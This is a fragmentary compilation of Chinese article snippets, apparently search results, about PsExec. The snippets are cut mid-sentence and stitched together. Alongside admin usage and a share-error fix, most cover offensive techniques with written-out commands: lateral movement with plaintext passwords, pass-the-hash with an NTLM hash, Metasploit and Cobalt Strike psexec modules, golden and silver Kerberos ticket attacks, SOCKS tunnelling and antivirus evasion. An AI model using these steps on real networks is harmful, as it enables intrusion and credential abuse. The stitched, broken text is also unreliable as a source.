Psexec被编写的初衷是为了方便服务器管理员管理大量的机器而开发的,但由于它的便捷,同时也被黑客使用。...psexec工具下载地址: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec cs也直接集成了这款工具 ?...psexec64来横向win2008 ?...\PsExec.exe \\192.168.154.31 -u administrator -p 123456 cmd ? ?...后记 本次研究psexec到这就基本结束了,我自己是没有能力研究出来的,参考了很多大佬的文章,尤其是倾旋大佬,再次感谢!
Psexec工具的使用 作者:谢公子 @深蓝攻防实验室 目录 psexec使用前提 工作组环境 域环境 登录域控 以域用户登录域成员主机...以本地用户登录域成员主机 MSF中的psexec模块 Impacket中的psexec.py psexec 是 windows 下非常好的一款远程命令行工具。...psexec.exe依赖于admin共享,而impacket下的psexec.py则依赖于admin或c psexec的基本原理是:通过管道在远程目标机器上创建一个psexec服务,并在本地磁盘中生成一个名为...然后,通过psexec服务运行命令,运行结束后删除服务。 在使用psexec执行远程命令时,会在目标系统中创建一个psexec服务。命令执行后,psexec服务将会被自动删除。...04 MSF中的psexec模块 END MSF中的psexec,主要讲以下两个: exploit/windows/smb/psexec:该模块生成的payload是exe程序 exploit/windows
前言psexec是sysinternals的一款强大的软件,通过它可以提权和执行远程命令,对于批量大范围的远程运维能起到很好的效果,尤其是在域环境下。...正文本文环境:Win10Win Server 2016先模拟一下PsExec的使用。...图片psexec的基本原理是:通过管道在远程目标机器上创建一个psexec服务,并在本地磁盘中生成一个名为"PSEXESVC"的二进制文件。然后,通过psexec服务运行命令,运行结束后删除服务。...PSExec的使用条件:对方主机开启了 admin共享,如果关闭了admin共享,会提示:找不到网络名如果是工作组环境,则必须使用administrator用户连接,使用普通用户连接会提示:登录失败:
PsExec属于SysInternalSuite (一个windows的内核的套件),是其中一个工具 下载地址: https://technet.microsoft.com/en-us/sysinternals...可以看到有147个小工具 psexec 这个工具可以以System账号执行一个程序 适合于本地提权 psexec -i -s cmd -i 使用交互模式运行程序 -s 使用SYSTEM账号来运行 ?
PsExec PsExec 主要用于大批量 Windows 主机的维护,在域环境下效果尤其好。...PsExec 的基本原理是:通过管道在远程目标主机上创建一个 psexec 服务,并在本地磁盘中生成一个名为”PSEXESVC“的二进制文件,然后通过 psexec 服务运行命令,运行结束后删除服务。...PsExec的使用 PsExec的使用 ---- 首先,需要获取目标操作系统的交互式 Shell。...---- Metasploit 使用 PsExec 模块 查找有关 psexec 的模块: search psexec ?...psexec_psh 模块和 psexec 模块的使用方法相同,二者的区别在于,通过 psexec_psh 模块上传的 payload 是 powershell 版本的。
Psexec Psexec被编写的初衷是为了方便服务器管理员管理大量的机器而开发的,但由于它的便捷,同时也被黑客使用。...psexec工具下载地址:https://docs.microsoft.com/en-us/sysinternals/downloads/psexec cs也直接集成了这款工具 Psexec原理分析...环境 win10 :192.168.154.7 win server 2008 X64 :192.168.154.31 假设已经得到win10主机的system权限在cs上通过psexec64来横向win2008...\PsExec.exe \\192.168.154.31 -u administrator -p 123456 cmd 设置过滤规则 ip.src==192.168.154.31 or ip.dst...实现psexec 一.与目标主机建立SMB连接 WNetAddConnection2 DWORD WNetAddConnection2W( LPNETRESOURCEW lpNetResource,
下载psexechttps://live.sysinternals.com/PsExec.exehttps://live.sysinternals.com/PsExec64.exe下载后放到服务器C:\...Windows\System32目录下然后以Administrator身份在cmd命令行执行psexec.exe -accepteula -nobanner -i -s powershellpsexec.exe...-accepteula -nobanner -i -s cmd或PsExec64.exe -accepteula -nobanner -i -s powershellPsExec64.exe -accepteula...-nobanner -i -s cmdpsexec后面的参数-accepteula -nobanner 是接受协议、隐藏回显头部信息的,可有可无,主要是后面的-is简单记的话就是psexec -is...cmd或psexec -is powershell,执行后会打开一个有system权限(比Administrator权限大)的窗口,在这个窗口里执行你想执行的命令,比如删除某个有权限保护但没啥用的文件夹
近日,深信服安全团队发现了GlobeImposter2.0勒索病毒新变种,该变种疑似利用微软官网工具PsExec进行内网传播并使用了新的勒索界面。...GlobeImposter2.0最新变种详细分析 在被勒索的主机中,发现勒索时间点生成了PsExec服务以及3个脚本文件: ?...PsExec是微软发布的一个轻量级telnet替代工具,使用者无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。
psexec 提权时报错 Error creating key file on ……找不到网络名解决方案:执行net share看有没有如下图的ADMIN$没有的话执行下2句命令reg add "HKEY_LOCAL_MACHINE...CurrentControlSet\Services\LanmanServer\Parameters" /v "AutoShareWks" /t REG_DWORD /d 1 /f执行命令后重启系统就可以了正常执行提权命令了,例如:PsExec64....exe -accepteula -nobanner -i -s powershellPsExec64.exe -accepteula -nobanner -i -s cmd网上还有说使用psexec...2.20版本没有这个报错,说是psexec 2.3*的bug,https://docs.microsoft.com/en-us/answers/questions/522749/psexec-after
本篇将讲到用PsExec.exe这个工具进行远程调用。 1.首次运行PowerShell.exe 双击PowerShell.exe,同意licence条款。 ? 2.查看PowerShell帮助 ?...\PsExec \\$MachineIP -u $DomainUser -p $Password -i 0 -s -w $WorkPath powershell "$WorkPath\Scripts\test.ps1...$Param" 注意: 1.远程机器磁盘上需要有“$WorkPath\Scripts\test.ps1”这个文件; 2.远程机器上不需要有PsExec.exe文件。...\PsExec \\$MachineIP -u $DomainUser -p $Password -h -i 0 -s -w $WorkPath powershell "$WorkPath\Scripts...\PsExec -i -s -w $WorkPath powershell ".\test.ps1" 结果如下图所示: ?
由于当前内网是有 VIPRE AV 的,不能使用常规的 Psexec 和 WMI,不然必被拦截!...这个时候我使用我插件里的工具进行 Psexec:(其实有很多工具都可以实现 Bypass AV 横向 psexec 的,我只写了一个(github上的项目),有空再加上去发出来给兄弟们) ? ?
Trace即可查看更多详细日志信息; 注意,LevelFilter::Trace将会记录下包括密码在内的所有内容; 用户指南 现在,这款应用程序仅支持在Windows系统上运行,目标设备必须是Windows或Linux...,我们可以将—psexec替换为下列选项: —psexec —psrem —rdp —wmi —ssh 我们也可以一次使用多种方法。...运行自定义命令 Gargamel可以在远程主机中运行自定义Windows CMD或Linux Shell命令。...--ssh Acquire evidence from Linux machine using SSH....(Linux target only) --timeout Optional: Timeout in seconds for long running
\PsExec.exe -accepteula \\ cmd 0x05 Pass The Ticket (PTT) 从Linux中获得tickets 检查tickets...:WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("")) 使用ticket_converter.py在Linux...ticket_converter.py ticket.kirbi ticket.ccache python ticket_converter.py ticket.ccache ticket.kirbi 在Linux...\Rubeus.exe ptt /ticket: 使用PsExec在远程计算机中执行cmd : ....\Rubeus.exe ptt /ticket: 使用PsExec在远程计算机中执行cmd : .
Psexec的设计目的是替代telnet来帮助系统管理员进行远程管理。...协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十一.内网穿透之利用SSH协议进行隧道穿透ATT&CK视角下的红蓝对抗:十二.内网穿透之Windows文件传输技术详解ATT&CK视角下的红蓝对抗:十三.内网穿透之Linux...Psexec的设计目的是替代telnet来帮助系统管理员进行远程管理。...通过Psexec的-s参数,可以指定程序以System权限运行。...当建立IPC$连接后,使用Psexec连接目标机器,执行命令Psexec.exe \\192.168.1.3-s cmd.exe,即可与靶标机器建立交互式会话,命令执行结果如图1-5所示。
: 攻击者在域中获得管理员权限 攻击者提取域用户"krbtgt"的ntlm哈希,并获取目标域的SID 攻击者伪造kerberos票 此票据用于使用域管理员的权限进行身份验证 以下是关于如何在Kali Linux...差不多好了,需要导出系统变量,所以impacket的psexec.py可以使用票证。运行psexec.py时,使用-k键进行Kerberos身份验证: ?...除了psexec以外,还可以使用其他工具例如wmiexec.py(它比psexec.py更加隐蔽,因为它不会上传任何二进制文件并且不启动任何服务)或atexec.py(使用计划的任务执行代码): ?...# defaults set to "tor" socks4 172.16.46.157 3128 如果我们正确设置了/etc/hosts和/etc/krb5.conf,那么运行smbclient或psexec.py...需要注意的一点是,psexec.py对我们提供的信息,域名和用户名应与我们使用ticketer.py伪造票据时输入的完全相同,这样才能保证成功。
在上线的主机上运行以下命令 make_token [DOMAIN\user] [password]jump psexec_psh [listener] 整体的流程就是下面这张图一样...首先使 Win1 主机上线,接着在 Linux1 主机上通过 SSH 连接到 Linux2 主机。...在 Linux1 主机上开启 445 端口转发 socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1:192.168.232.132:445 3....jump psexec_psh 192.168.175.200 smb beacon> make_token teamssix\administrator Test123!...administrator[+] host called home, sent: 61 bytes[+] Impersonated WINTEST\Administrator beacon> jump psexec_psh
PsExec一行命令就可以实现: PsExec.exe @file -u administrator -p xxxx -s -i -c 1.bat 如上,PsExec将在file文件中列出的每台计算机上执行...场景3:Linux服务器批量执行命令 在Linux自动化运维里,有很多类似的工具,可以实现批量命令执行,如Ansible、SaltStack、Fabric、Puppet、Chef等。
/ew_for_linux64 -s rcsocks -l 1080 -e 112 ?...横向移动 psexec 直接kllist看到当前存在凭证 -accepteula初次打开会出现一堆信息,添加这个命令不会出现一堆信息 PsExec.exe -accepteula \\owa.god.org...cmd PsExec.exe \\owa.god.org -u god\Administrator -p hongrisec@2019: cmd.exe PsExec.exe \\192.168.52.138...) > use exploit/windows/smb/psexec msf5 exploit(windows/smb/psexec) > show options set payload...执行命令 use auxiliary/admin/smb/psexec_command msf5 auxiliary(admin/smb/psexec_command) > set RHOSTS 192.168.52.138
由于 Windows 默认不会将 WMI 的操作记录在日志里,同时现在越来越多的杀软将 PsExec 加入了黑名单,因此 WMI 比 PsExec 隐蔽性要更好一些。...程序,使用方法如下: psexec -hashes 00000000000000000000000000000000:e19ccf75ee54e06b06a5907af13cef42 Administrator...功能哈希传递: use exploit/windows/smb/psexec set RHOST 192.168.237.209 set SMBUser Administrator set SMBPass...此外还有一个支持RDP服务哈希传递的工具,是linux系统下的,名叫FreeRDP-pth,使用挺麻烦的,因为编译特别费事,我还是使用mimikatz吧,大家感兴趣可以去编译一下。...u Administrator -H e19ccf75ee54e06b06a5907af13cef42 第2个工具就是大名鼎鼎的crackmapexec了,新版已经支持winrm哈希传递,kali linux2020
127.0.0.1localhost 192.168.75.128aaa.bbb(FQDN) 192.168.75.137 WIN-111(NETbios) 如果您还没有域控制器的IP地址,请通过目标Linux.../psexec.py user@WIN-111 -k -no-pass 也可以用MSF use exploit/windows/smb/psexec_psh No.8 银票 两个票据之间的区别:...将ccache文件Kekeo输出复制到攻击Linux主机。确保在Linux主机上记下文件的绝对路径; 我们需要它来设置KRB5CCNAME变量。其余的攻击使用我们的Linux主机。...No.11 启动攻击 我们现在可以psexec.py针对目标主机的FQDN 启动攻击: proxychains python psexec.py user@WIN-111.aaa.bbb -k -no-pass
领取专属 10元无门槛券
手把手带您无忧上云